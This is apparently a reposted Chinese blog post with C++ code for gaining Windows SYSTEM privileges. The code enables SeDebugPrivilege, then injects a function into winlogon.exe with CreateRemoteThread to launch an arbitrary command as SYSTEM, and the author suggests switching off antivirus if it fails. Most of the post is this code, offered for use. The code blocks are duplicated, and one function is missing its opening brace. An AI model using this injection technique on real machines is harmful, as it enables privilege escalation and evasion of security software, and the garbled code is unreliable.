获取本地System权限
2024-04-06 15:37:30
作为C++方面的第一片文章,就先说说获取权限方面的东西吧!首先是获取DeBug权限(它是做其他进一步工作的基础),想必大家对这个方法应该很熟悉吧,网上有关这个的文章已经很多了,所以我就直接贴代码了!
代码
1 BOOL WINAPI EnterDebug()
2 {
3
4 HANDLE retokenhandle;
5 BOOL res = FALSE;
6 BOOL fOK = FALSE;
7 LUID tmpluid;
8 TOKEN_PRIVILEGES tkp;
9
10 __try
11 {
12
13 OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&retokenhandle);
14
15 if (retokenhandle == 0){__leave;}
16
17 res = LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tmpluid);
18
19 if (res == 0){__leave;}
20
21 tkp.PrivilegeCount = 1;
22 tkp.Privileges->Luid = tmpluid;
23 tkp.Privileges->Attributes = SE_PRIVILEGE_ENABLED;
24
25 res = AdjustTokenPrivileges(retokenhandle,FALSE,&tkp,0,0,0);
26
27 if (res == FALSE){__leave;}
28
29 fOK = TRUE;
30
31 }
32 __finally
33 {
34 if (retokenhandle != 0 ){CloseHandle(retokenhandle);}
35
36 }
37
38 return fOK;
39
40 }
41
42
2 {
3
4 HANDLE retokenhandle;
5 BOOL res = FALSE;
6 BOOL fOK = FALSE;
7 LUID tmpluid;
8 TOKEN_PRIVILEGES tkp;
9
10 __try
11 {
12
13 OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&retokenhandle);
14
15 if (retokenhandle == 0){__leave;}
16
17 res = LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tmpluid);
18
19 if (res == 0){__leave;}
20
21 tkp.PrivilegeCount = 1;
22 tkp.Privileges->Luid = tmpluid;
23 tkp.Privileges->Attributes = SE_PRIVILEGE_ENABLED;
24
25 res = AdjustTokenPrivileges(retokenhandle,FALSE,&tkp,0,0,0);
26
27 if (res == FALSE){__leave;}
28
29 fOK = TRUE;
30
31 }
32 __finally
33 {
34 if (retokenhandle != 0 ){CloseHandle(retokenhandle);}
35
36 }
37
38 return fOK;
39
40 }
41
42
好了,以上就是全过程,并且在 WindowsXP SP2 VC2008 下编译通过。如果无法运行,可以关掉杀毒软件再试试。
接下来要着重讲的是如何获取System权限,System权限也就是系统当中的最高权限,拥有所有特权。软件拥有了他可以干很多事!
现在比较流行的获取方式有两种,第一种是通过HOOK挂钩相应的API函数,从而在创建进程前修改其继承的进程,改为从有System权限的进程继承(如winlogon.exe)。第二种是通过远线程将创建进程的代码注入到winlogon.exe中,从而创建进程的是winlogon.exe,那么被创建的进程自然也有System权限了。
但两种方法都有缺点,第一种:要挂钩的函数在不同版本的操作系统中不同,所以通用性不强。第二种:因为用了远线程,所以容易被杀毒软件消灭。
在这里我先讲第二种方法,第一种我以后再讲。
在做以下工作之前一定要先获得DeBug权限。
代码
1 static struct MyData //定义远线程所需的参数结果
2 {
3 LPVOID addrCreateProcess;
4 LPVOID addrExitThread;
5 WCHAR wsCmdLine[MAX_PATH];
6 WCHAR stDesktop[16];
7 STARTUPINFO si;
8 LPPROCESS_INFORMATION ppinfo;
9
10 };
11
12 static void WINAPI RemoteFunction(MyData *pData);
13 static void WINAPI endFunction();
14
15 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess);
16
17 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName);
18
19 //
20
21 static void WINAPI RemoteFunction(MyData *pData)//将要注入进程的代码。(必需要有static修饰)
22
23
24
25 typedef LONG (WINAPI *CREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCTSTR lpCurrentDirectory,LPSTARTUPINFO lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation );
26
27 CREATEPROCESS RemoteCreateProcess = (CREATEPROCESS)pData->addrCreateProcess;
28
29 pData->si.lpDesktop = (LPWSTR)&(pData->stDesktop);
30
31
32 RemoteCreateProcess(NULL,pData->wsCmdLine,NULL,NULL,TRUE,0,NULL,NULL,(LPSTARTUPINFO)&(pData->si),pData->ppinfo);
33
34 }
35
36 static void WINAPI endFunction()//上述函数的结束标志。(必需要有static修饰,且必需接在上面的函数之后)
37 {
38 }
39
40
41 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess)//进行注入操作。
42 {
43
44 BOOL res = FALSE;
45 HANDLE hThread = 0;
46 UINT SizeOfFunction = 0;
47 LPVOID RemoteAddress = 0;
48
49 LPVOID ReDataAddress = 0;
50
51 LPVOID Reppinfo = 0;
52
53 MyData data = {0};
54 wcscpy_s(data.wsCmdLine ,CmdLines);
55 wcscpy_s(data.stDesktop,L"WinSta0\\Default");
56 data.si.cb = sizeof(STARTUPINFO);
57 data.si.dwFlags = 1;
58 data.si.wShowWindow = WinShow;
59
60 __try
61 {
62
63 data.addrCreateProcess = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"CreateProcessW");
64 if (data.addrCreateProcess == 0)__leave;
65
66 data.addrExitThread = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"ExitThread");
67 if (data.addrExitThread == 0)__leave;
68
69 //以上过程将远线程要调用的函数地址及参数全部通过MyData结构写入winlogon.exe的进程空间。
70
71 ////分配内存空间////
72 if (hProcess == 0)__leave;
73
74 SizeOfFunction = (UINT)endFunction - (UINT)RemoteFunction;
75 if (SizeOfFunction == 0)__leave;
76
77 RemoteAddress = VirtualAllocEx(hProcess,NULL,SizeOfFunction,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
78 if (RemoteAddress == 0)__leave;
79
80 if (!WriteProcessMemory(hProcess,RemoteAddress,(LPCVOID)RemoteFunction,SizeOfFunction,0))__leave;
81
82
83
84 Reppinfo = VirtualAllocEx(hProcess,NULL,sizeof(PROCESS_INFORMATION),MEM_COMMIT,PAGE_READWRITE);
85 if (Reppinfo == 0)__leave;
86
87 data.ppinfo = (LPPROCESS_INFORMATION)Reppinfo;
88
89 ReDataAddress = VirtualAllocEx(hProcess,NULL,sizeof(data),MEM_COMMIT,PAGE_READWRITE);
90 if (ReDataAddress == 0)__leave;
91
92 if (!WriteProcessMemory(hProcess,ReDataAddress,&data,sizeof(data),0))__leave;
93
94
95
96
97 //创建远线程//
98
99 hThread = CreateRemoteThread(hProcess,NULL,NULL,(PTHREAD_START_ROUTINE)RemoteAddress,ReDataAddress,NULL,NULL);
100 if (hThread == 0)__leave;
101
102 WaitForSingleObject(hThread,INFINITE);
103
104 res = TRUE;
105
106 }
107 __finally
108 {
109
110 if (RemoteAddress != 0){ VirtualFreeEx(hProcess,RemoteAddress,0,MEM_RELEASE);}
111
112 if (ReDataAddress != 0){ VirtualFreeEx(hProcess,ReDataAddress,0,MEM_RELEASE);}
113
114 if (Reppinfo != 0){ VirtualFreeEx(hProcess,Reppinfo,0,MEM_RELEASE);}
115
116 if (hThread != 0){ CloseHandle(hThread);}
117
118 if (hProcess != 0){ CloseHandle(hProcess);}
119
120 }
121
122 return res;
123 }
124
125
126 //下面这个函数不是必要的,我只是通过它来获得winlogon.exe的进程句柄。
127
128 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName)
129 {
130
131 BOOL fOK = FALSE;
132 DWORD ProcIDs[1024] = {0};
133 DWORD dwLengthOfProc = 0;
134 HANDLE hp = NULL;
135 DWORD nSize = 0;
136
137 fOK = EnumProcesses(ProcIDs,sizeof(ProcIDs),&dwLengthOfProc);
138 if (fOK == FALSE){return 0;}
139
140 for(DWORD i = 0;i<(dwLengthOfProc/sizeof(DWORD));i++)
141 {
142 hp = OpenProcess(dwDesiredAccess,bInheritHandle,ProcIDs[i]);
143 if (hp == NULL)continue;
144
145 WCHAR wcFilePath[MAX_PATH] = {0};
146 nSize = GetModuleFileNameEx(hp,0,wcFilePath,MAX_PATH);
147 if (nSize == 0)
148 {
149 CloseHandle(hp);
150 continue;
151 }
152
153 if (_wcsicmp(&wcFilePath[nSize - wcslen(wcProcessName)],wcProcessName) == 0)
154 {
155 return hp;
156 }
157
158 CloseHandle(hp);
159
160 }
161
162 return 0;
163
164 }
165
2 {
3 LPVOID addrCreateProcess;
4 LPVOID addrExitThread;
5 WCHAR wsCmdLine[MAX_PATH];
6 WCHAR stDesktop[16];
7 STARTUPINFO si;
8 LPPROCESS_INFORMATION ppinfo;
9
10 };
11
12 static void WINAPI RemoteFunction(MyData *pData);
13 static void WINAPI endFunction();
14
15 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess);
16
17 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName);
18
19 //
20
21 static void WINAPI RemoteFunction(MyData *pData)//将要注入进程的代码。(必需要有static修饰)
22
23
24
25 typedef LONG (WINAPI *CREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine,LPSECURITY_ATTRIBUTES lpProcessAttributes,LPSECURITY_ATTRIBUTES lpThreadAttributes,BOOL bInheritHandles,DWORD dwCreationFlags,LPVOID lpEnvironment,LPCTSTR lpCurrentDirectory,LPSTARTUPINFO lpStartupInfo,LPPROCESS_INFORMATION lpProcessInformation );
26
27 CREATEPROCESS RemoteCreateProcess = (CREATEPROCESS)pData->addrCreateProcess;
28
29 pData->si.lpDesktop = (LPWSTR)&(pData->stDesktop);
30
31
32 RemoteCreateProcess(NULL,pData->wsCmdLine,NULL,NULL,TRUE,0,NULL,NULL,(LPSTARTUPINFO)&(pData->si),pData->ppinfo);
33
34 }
35
36 static void WINAPI endFunction()//上述函数的结束标志。(必需要有static修饰,且必需接在上面的函数之后)
37 {
38 }
39
40
41 BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess)//进行注入操作。
42 {
43
44 BOOL res = FALSE;
45 HANDLE hThread = 0;
46 UINT SizeOfFunction = 0;
47 LPVOID RemoteAddress = 0;
48
49 LPVOID ReDataAddress = 0;
50
51 LPVOID Reppinfo = 0;
52
53 MyData data = {0};
54 wcscpy_s(data.wsCmdLine ,CmdLines);
55 wcscpy_s(data.stDesktop,L"WinSta0\\Default");
56 data.si.cb = sizeof(STARTUPINFO);
57 data.si.dwFlags = 1;
58 data.si.wShowWindow = WinShow;
59
60 __try
61 {
62
63 data.addrCreateProcess = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"CreateProcessW");
64 if (data.addrCreateProcess == 0)__leave;
65
66 data.addrExitThread = GetProcAddress(GetModuleHandle(L"kernel32.dll"),"ExitThread");
67 if (data.addrExitThread == 0)__leave;
68
69 //以上过程将远线程要调用的函数地址及参数全部通过MyData结构写入winlogon.exe的进程空间。
70
71 ////分配内存空间////
72 if (hProcess == 0)__leave;
73
74 SizeOfFunction = (UINT)endFunction - (UINT)RemoteFunction;
75 if (SizeOfFunction == 0)__leave;
76
77 RemoteAddress = VirtualAllocEx(hProcess,NULL,SizeOfFunction,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
78 if (RemoteAddress == 0)__leave;
79
80 if (!WriteProcessMemory(hProcess,RemoteAddress,(LPCVOID)RemoteFunction,SizeOfFunction,0))__leave;
81
82
83
84 Reppinfo = VirtualAllocEx(hProcess,NULL,sizeof(PROCESS_INFORMATION),MEM_COMMIT,PAGE_READWRITE);
85 if (Reppinfo == 0)__leave;
86
87 data.ppinfo = (LPPROCESS_INFORMATION)Reppinfo;
88
89 ReDataAddress = VirtualAllocEx(hProcess,NULL,sizeof(data),MEM_COMMIT,PAGE_READWRITE);
90 if (ReDataAddress == 0)__leave;
91
92 if (!WriteProcessMemory(hProcess,ReDataAddress,&data,sizeof(data),0))__leave;
93
94
95
96
97 //创建远线程//
98
99 hThread = CreateRemoteThread(hProcess,NULL,NULL,(PTHREAD_START_ROUTINE)RemoteAddress,ReDataAddress,NULL,NULL);
100 if (hThread == 0)__leave;
101
102 WaitForSingleObject(hThread,INFINITE);
103
104 res = TRUE;
105
106 }
107 __finally
108 {
109
110 if (RemoteAddress != 0){ VirtualFreeEx(hProcess,RemoteAddress,0,MEM_RELEASE);}
111
112 if (ReDataAddress != 0){ VirtualFreeEx(hProcess,ReDataAddress,0,MEM_RELEASE);}
113
114 if (Reppinfo != 0){ VirtualFreeEx(hProcess,Reppinfo,0,MEM_RELEASE);}
115
116 if (hThread != 0){ CloseHandle(hThread);}
117
118 if (hProcess != 0){ CloseHandle(hProcess);}
119
120 }
121
122 return res;
123 }
124
125
126 //下面这个函数不是必要的,我只是通过它来获得winlogon.exe的进程句柄。
127
128 HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName)
129 {
130
131 BOOL fOK = FALSE;
132 DWORD ProcIDs[1024] = {0};
133 DWORD dwLengthOfProc = 0;
134 HANDLE hp = NULL;
135 DWORD nSize = 0;
136
137 fOK = EnumProcesses(ProcIDs,sizeof(ProcIDs),&dwLengthOfProc);
138 if (fOK == FALSE){return 0;}
139
140 for(DWORD i = 0;i<(dwLengthOfProc/sizeof(DWORD));i++)
141 {
142 hp = OpenProcess(dwDesiredAccess,bInheritHandle,ProcIDs[i]);
143 if (hp == NULL)continue;
144
145 WCHAR wcFilePath[MAX_PATH] = {0};
146 nSize = GetModuleFileNameEx(hp,0,wcFilePath,MAX_PATH);
147 if (nSize == 0)
148 {
149 CloseHandle(hp);
150 continue;
151 }
152
153 if (_wcsicmp(&wcFilePath[nSize - wcslen(wcProcessName)],wcProcessName) == 0)
154 {
155 return hp;
156 }
157
158 CloseHandle(hp);
159
160 }
161
162 return 0;
163
164 }
165
转载于:https://www.cnblogs.com/AniX/archive/2010/10/16/1853023.html
获取本地System权限相关推荐
- win7系统怎么获取system权限?
日常使用系统中,经常有一些像恶意顽固程序及无法删除文件.需要高权限操作.丢失密码.要求最高私密性的问题.在本文中,将教你如何使用Windows 7最高权限账户system,解决各位TX的所有此类问题! ...
- android debug bridge tools_飞凌干货丨Android 应用程序如何获取system权限
当Android应用程序用到重启系统.关闭系统.修改系统时间等功能时,需要用到system权限. 本文以OKxx18平台实现重启功能的应用程序PermissionTest为例,说明获取系统权限的方法. ...
- 获取比Administrator还高的权限——SYSTEM权限
获取比Administrator还高的权限--SYSTEM权限 设置PsTool环境 常用命令 以系统权限打开cmd 以系统权限打开explorer(其实也是桌面) 首先,我们会用到PsTool中的P ...
- android第三方app改为系统app,加入system组,获取system权限
用Androd studio 开发的app,编译出apk, 想获取system权限. 环境:编译好的apk, android 源码环境,有root权限和源码对应的开发板,我这里是user版本. 思路: ...
- Android开发:实现系统自带截屏功能 需要获取System权限
在一个service界面上,点击一个button按钮,可以截屏 贴上代码: mButton.setOnClickListener(new OnClickListener(){ pub ...
- Android应用如何获取System权限和root权限
Android应用获取System权限的方式有以下两种: 第一种: 需要在Android系统源码的环境下用make来编译: 1. 在应用程序的AndroidManifest.xml中的manifest ...
- 服务器系统获取最高权限,webshell+serv-u获取系统最高权限
下面详细说说webshell+serv-u获取系统最高权限的方法及补救方法. 原理: serv-u默认监听127.0.0.1:43958,在本机才能连接这个管理端口,serv-u默认管理账号是Loca ...
- 如何在SYSTEM权限下实现屏幕监控
屏幕监控是远控软件的基本功能之一. 版权声明 作者:iprowq 现在很多远控程序的服务端通常为DLL形式,通过远程线程注入等方法插入到services.svchost等SYSTEM权限的进程中去,而 ...
- 取得system权限
这几天,无意中看到 strfreedom会员 说用ntsd命令杀掉进程的方法 [url]http://softbbs.pconline.com.cn/topic.jsp?tid=6598431& ...
最新文章
- linux shell之数组
- linux中ed编辑器手册,脚本编辑器 - Navicat 15 for Linux 产品手册
- 【C++ Priemr | 15】面向对象程序设计
- mysql 视图sql_SQL的视图
- 机器学习代码实战——逻辑回归(Logistic Regression)
- 1到9排序php,php通过排列组合实现1到9数字相加都等于20的方法,php排列组合_PHP教程...
- 或是全球首款接入5G网络手机 华为折叠屏新机2月24日发布
- 安兔兔跑分可信吗_安兔兔跑分能信吗?手机性能与跑分关系分析,说点你不知道的!...
- python爬取淘宝数据魔方_淘宝数据魔方是什么(淘宝数据魔方技术架构解析)
- 京东快运 | 快递单号查询API
- 小程序scroll-view,滚动到最低_小程序滚动到底部
- 基于微信小程序的货物管理系统的设计与实现-计算机毕业设计源码+LW文档
- VS1005 HiRes 高清录音开发板(带显示屏)
- 剪切文件丢失如何恢复
- win10给扩展屏设置单独的壁纸(win10自带这个功能)
- 一元多项式 java_java链表实现一元多项式的合并同类项以及加法
- vue3之常范低级错误の错误指南
- 找不到电脑C盘下的AppData文件夹怎么办?
- IOS开发之隐藏软键盘
- NEON intrinsic 简易入门指南